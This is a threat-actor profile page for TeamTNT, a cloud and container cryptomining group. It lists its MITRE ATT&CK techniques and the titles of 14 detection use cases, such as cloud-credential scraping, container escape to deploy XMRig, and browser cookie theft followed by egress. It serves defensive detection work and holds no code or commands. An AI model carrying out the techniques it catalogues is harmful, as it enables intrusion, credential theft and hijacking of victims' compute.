Clankerusecase
Threat-actor profile
 ← Back to main site
Home/ Threat Actors/ TeamTNT

🌐TeamTNT

🌐 TeamTNT is a tracked threat actor in the Clankerusecase corpus. ??-aligned. Primary motivation: Unknown. We map 14 detection use cases to this actor across 56 MITRE ATT&CK techniques, with 0 threat-intel articles citing them.

View full actor card → All threat actors MITRE ATT&CK group spec (G0139) ↗
14Use cases
0Articles
56Techniques
0IOCs

About this actor (MITRE)

[TeamTNT](https://attack.mitre.org/groups/G0139) is a threat group that has primarily targeted cloud and containerized environments. The group as been active since at least October 2019 and has mainly focused its efforts on leveraging cloud and container resources to deploy cryptocurrency miners in victim environments.(Citation: Palo Alto Black-T October 2020)(Citation: Lacework TeamTNT May 2021)(Citation: Intezer TeamTNT September 2020)(Citation: Cado Security TeamTNT Worm August 2020)(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro TeamTNT)(Citation: ATT TeamTNT Chimaera September

Known aliases

TeamTNT

Top techniques

T1007 · System Service DiscoveryT1014 · RootkitT1016 · System Network Configuration Discovery

All other tracked techniques

T1021.004 · SSHT1027.002 · Software PackingT1027.013 · Encrypted/Encoded FileT1036 · MasqueradingT1036.005 · Match Legitimate Resource Name or LocationT1046 · Network Service DiscoveryT1048 · Exfiltration Over Alternative ProtocolT1049 · System Network Connections DiscoveryT1057 · Process DiscoveryT1059.001 · PowerShellT1059.003 · Windows Command ShellT1059.004 · Unix ShellT1059.009 · Cloud APIT1059.013 · Container CLI/APIT1070.003 · Clear Command HistoryT1070.004 · File DeletionT1071 · Application Layer ProtocolT1071.001 · Web ProtocolsT1074.001 · Local Data StagingT1082 · System Information DiscoveryT1083 · File and Directory DiscoveryT1098.004 · SSH Authorized KeysT1102 · Web ServiceT1105 · Ingress Tool TransferT1120 · Peripheral Device DiscoveryT1133 · External Remote ServicesT1136.001 · Local AccountT1140 · Deobfuscate/Decode Files or InformationT1204.003 · Malicious ImageT1219 · Remote Access ToolsT1222.002 · Linux and Mac PermissionsT1496.001 · Compute HijackingT1518.001 · Security Software DiscoveryT1543.002 · Systemd ServiceT1543.003 · Windows ServiceT1547.001 · Registry Run Keys / Startup FolderT1552.001 · Credentials In FilesT1552.004 · Private KeysT1552.005 · Cloud Instance Metadata APIT1569.003 · SystemctlT1583.001 · DomainsT1587.001 · MalwareT1595.001 · Scanning IP BlocksT1595.002 · Vulnerability ScanningT1608.001 · Upload MalwareT1609 · Container Administration CommandT1610 · Deploy ContainerT1611 · Escape to HostT1613 · Container and Resource DiscoveryT1680 · Local Storage DiscoveryT1685 · Disable or Modify ToolsT1685.006 · Clear Linux or Mac System LogsT1686 · Disable or Modify System Firewall

Detection use cases (14)

TeamTNT cloud-credential & IMDS scrape from Linux shell (Chimaera / Black-T pattern) AI · profile SΣ TeamTNT container escape / Docker-API abuse spawning XMRig (Hildegard / Kinsing-style miner deploy) AI · profile S Auth-Bypass on Public-Facing Service → Post-Exploit Action on Same Host (≤10 min) MITRE match Brand-Impersonation Domain Fetch Followed by User-Context Loader Within 10 Minutes MITRE match Cross-category credential-store enumeration with rapid egress to anonymizing tunnel/CDN MITRE match Cross-Platform ClickFix Paste-to-Pipe Loader (UI-Parent Shell with Decode-and-Execute Payload) MITRE match Developer/Data-tooling Daemon Spawns Shell Child Seconds After POST to Runner/Exec Endpoint MITRE match Edge-service post-exploitation chain: internet-facing daemon → child shell or token redemption within 10 min of external request MITRE match Internet-Facing Service Process Spawning Unix Shell or Ingress-Tool LOLBin (Edge Zero-Day Post-Exploit) MITRE match Internet-facing service process spawns shell/LOLBin within minutes of public inbound connection — post-RCE command execution MITRE match Language-runtime server (node/python/java) spawns OS shell shortly after inbound request — eval / sandbox-escape exploitation chain MITRE match Linux LPE chain — anomalous algif_aead/esp4/esp6/rxrpc kernel-module load followed by same-user root transition MITRE match Low-Code / AI Workflow Runtime Sandbox-Escape — Server Process Spawns Shell + Public Egress MITRE match Non-Browser Process Reads Browser Credential / Cookie SQLite Then Egresses to Public Destination Within 10 Minutes MITRE match